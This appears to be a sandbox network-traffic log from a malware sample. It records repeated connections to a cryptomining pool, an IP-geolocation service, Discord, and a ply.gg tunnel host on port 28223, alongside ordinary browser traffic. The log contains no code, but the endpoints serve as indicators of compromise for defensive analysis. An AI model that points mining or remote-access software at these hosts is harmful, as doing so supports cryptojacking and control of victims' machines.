US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 52.25.243.81:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 81.243.25.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.187.196:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:64843 tcp
N/A 127.0.0.1:64860 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
N/A 127.0.0.1:28223 tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
